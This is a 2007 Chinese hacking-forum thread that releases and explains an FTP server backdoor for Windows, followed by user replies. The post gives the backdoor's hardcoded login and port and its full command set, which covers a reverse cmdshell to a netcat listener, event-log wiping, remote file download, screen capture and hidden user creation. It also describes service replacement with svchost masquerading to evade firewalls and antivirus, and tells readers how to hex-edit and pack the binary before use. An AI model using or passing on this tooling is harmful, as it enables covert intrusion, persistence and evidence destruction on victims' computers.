文章作者：单克隆抗体
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注意：文章首发东南大学网络安全联盟论坛(www.bestseu.com/sus/)，后由作者友情提交到邪恶八进制信息安全团队技术论坛，转载请注明首发站点。

这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序，任何时间，任何地点，想怎么控制，就怎么玩。再加上它原创免杀的特性.怎么样，跃跃欲试了吧？

这次发布的是测试版，压缩包内共一个文件wmiapsrv.exe。测试方法：将其解压到一个不含空格的目录里，如c:\windows\system32.运行即可。这样服务端便成功安装并运行了。

只需用任一款ftp连接工具（包括windows自带的ftp和IE），ip地址填服务端ip，端口填2100，用户名填sus，密码填sus666，确定后服务端的c:盘便立刻展现在眼前。

再看看其它的控制功能怎么实现的呢？
这里提供2种方法：

1.
telnet <服务端ip> 2100
输入user sus
pass sus666
待它显示Logged on后，便可以输入后门控制命令，如pslist。


2.
运行ftp.exe，然后输入open <服务端ip> 2100，按照提示输入用户名sus，密码sus666便登陆进去了。除了运行传统的ftp命令外，这里还可以用quote加上马上要提到的后门控制命令，如quote pslist。


专用的后门控制命令如下，这些在你输入help的时候显示出来。
######################################################################
Thank you for using the SUS&#39;s FTP BackDoor! Welcome to SUS!
Author: dklkt    Date: 2007.7
######################################################################

WINEXEC <exefilepath>      Using this to execute an executable file.
SHELLEXECUTE <exefilepath>   The same to above.
SETHOMEDIR <ftp&#39;s homedir>   Set the home directory of ftp&#39;s. Default is C:\
GETSYSINFO           Get some system infomation
PSLIST             List the Process on the system
PSKILL <PID>          Kill a process by its pid
VIEWTERMPORT          View Terminal Service&#39;s port. Default is 3389
SETTERMPORT <PortNum>      Set the Terminal Service&#39;s Port.
INSTALLTERM           Install Terminal Service.
CLEANEVENT           Clean the system event logs.
ENUMSERVICE           List all the services in the system.
STARTSERVICE <ServcieName>   Start a service. Like "net start"
STOPSERVICE <ServiceName>   Stop a service.
DELETESERVICE <ServiceName>   Delete a service.
VIEWSERVICE <ServiceName>   View the detail of a service.
CONFIGSERVICE <ServiceName> <Type> Change service type(Auto,Demand,Disable)
REBOOT             Reboot the system.
SHUTDOWN            Power off the system.
STOPBACKDOOR          Stop the Ftp Backdoor without uninstall it.
SENDBACKSHELL <ip> <port>    Send a back cmdshell. Use nc listen first
STARTSHELL <port>        Start a cmdshell and listen. You can telnet it.
CATCHSCREEN <bmpfilepath>    Catch the screen now and save it to a bmp file.
HTTPDOWNLOAD <filepath> <httpaddress>  Download a file using http protocol.
UNINSTALL            Uninstall the Ftp Backdoor!
-------------------------------------------------
Good Luck! :-)

（本人英语比较搓，大家意会便可，语法问题多多 ^_^）

比如你在telnet模式下，想运行c:\mm.exe这个程序，便输入
winexec c:\mm.exe

在ftp模式下，想添加一个系统用户，可以输入
quote shellexecute net.exe user aaa /add

在telnet模式下,想修改ftp服务的home目录位置到d:盘，可以输入
sethomedir d:\

相应的的，ftp模式下，前面加上quote
quote sethomedir d:\


另外，虽然这是测试版，但特意没有加壳。你也可以根据需要手动修改用户名和密码。只需用UltraEdit等工具查找sus666等字符串修改即可。端口也是可以修改的，2100对应的16进制是834，因为是反序的，所以你查找34 08这两个字节就可以了，大约是在第a230那一行，改成相应的就行。比如想改成21，就把它改成15 00。希望大家自己用用就好，没必要对外传播。还有最好自己加个壳再拿去做后门。


差点忘了。把特性说明下：
本后门是替换系统服务自启动的，启动后伪装成svchost进程（相似程度100％）穿透防火墙。估计一般的辅助工具不容易查出来，这里你可以使用stopbackdoor命令停止后门，用uninstall命令卸载后门。

代朋友发的,很简单,请牛人勿笑哦

codeproject有个封装很好的FTP服务器类，只需要几句代码可以实现一个FTP服务器
大家可以找找

我关系的问题是 倘若不小心中了这个东东

如何查杀?

替换什么服务,思路倒是挺好的

成功运行并开启了2100端口,但怎么我ftp和telnet都连不上呢

自定义盘符号，文件夹的，。

quote shellexecute net.exe user aaa /add 俺怎么不成功汗~


svchost进程 是以当前系统用户 - - 估计很容易给发现

支持~

引用:

引用第3楼ssspr于2007-08-01 17:19发表的 :
我关系的问题是 倘若不小心中了这个东东

如何查杀?

最简单的方式，想办法删掉它就可以了。

引用:

引用第4楼inking于2007-08-01 18:12发表的 :
替换什么服务,思路倒是挺好的

就是WmiApSrv

引用:

引用第6楼crab于2007-08-02 14:26发表的 :
svchost进程 是以当前系统用户 - - 估计很容易给发现

嗯，谢谢你的建议。不过目前重启后就是以SYSTEM运行的。


写这个本来是内部交流的，没什么含量。转发过来有些丢脸。高手可以pass。

发现个奇怪的问题，quote help就这样卡住了。不知各位的有没有出现这样的问题。还有9800的十六进制是2648，我改成4826，可端口成了18470。

引用:

引用第8楼wwww23于2007-08-03 07:31发表的 :
发现个奇怪的问题，quote help就这样卡住了。不知各位的有没有出现这样的问题。还有9800的十六进制是2648，我改成4826，可端口成了18470。

9800的16进制是2648
那你改成4826干什么
4826是16进制
转成10进制当然是18470

ps:酒后禁止上论坛

引用:

引用第8楼wwww23于2007-08-03 07:31发表的 :
发现个奇怪的问题，quote help就这样卡住了。不知各位的有没有出现这样的问题。还有9800的十六进制是2648，我改成4826，可端口成了18470。

quote help 确实有点问题，quote pslist可能也有点问题，quote getsysinfo也可能有点问题。毕竟windows的ftp.exe的目的不是用来干这个的。这些在telnet的方式都比较正常。

在ftp命令中quote的作用是将后面的参数直接发到服务器，比如quote syst实际上是把syst发到服务器。本程序正式利用了这一点，自己构造了很多命令从而实现后门。相比telnet模式，当以这种模式登陆到服务器时，输入的则直接作为命令发给服务器，比如直接输入LIST则可以列目录等。

关于端口的修改，我这里用的是UltraEdit，直接查找16进制修改的。具体问题具体分析。

XP_SP2下的测试结果，有点小问题。

当控制端运行stopbackdoor命令时，被控端的屏幕会显示三次这种结果，如图：

大哥, 能不能把这个程序作者的联系方式给我. 我想和他一起开发这个软件。 我现在写的后门,功能与这个太像了..


拜托....

我的联系方式: QQ: 554047943     验证: 关于SU FTP
电子邮件: xionglonghui@yahoo.com.cn

楼主，想问您一个问题。这个程序所谓的替换系统服务隐身功能是不是程序本身加了EXE注入SVCHOST。EXE 的代码。
我自己测试了下，单纯的替换系统服务，不加注入代码，程序运行一下就消失了，会意外中断。

还有，之所以系统会出现用户身份的SVCHOST。EXE也是因为用了普通方式启动。把它改成服务启动即可。


希望这个程序程序的作者速与我取得联系，我在写这方面的代码。想交流交流。
我QQ： 554047943   验证信息： su ftp
电子邮件：xionglonghui@yahoo.com.cn

引用:

引用第6楼crab于2007-08-02 14:26发表的 :
自定义盘符号，文件夹的，。

quote shellexecute net.exe user aaa /add 俺怎么不成功汗~


.......

应该是 quote site exec "net.exe user aaa /add"吧?
呵呵.我用的这个可以用.好像..~
这个后门太强悍了...而且就跟普通的FTP服务端一样..应该不会被杀毒软件干掉吧??
太无敌了.呵呵~~

测试了一下, FTP功能好象有点问题, FLASHFXP和CUTEFTP连都是无法显示目录, 被动模式和主动模式都试了.

后门功能正常....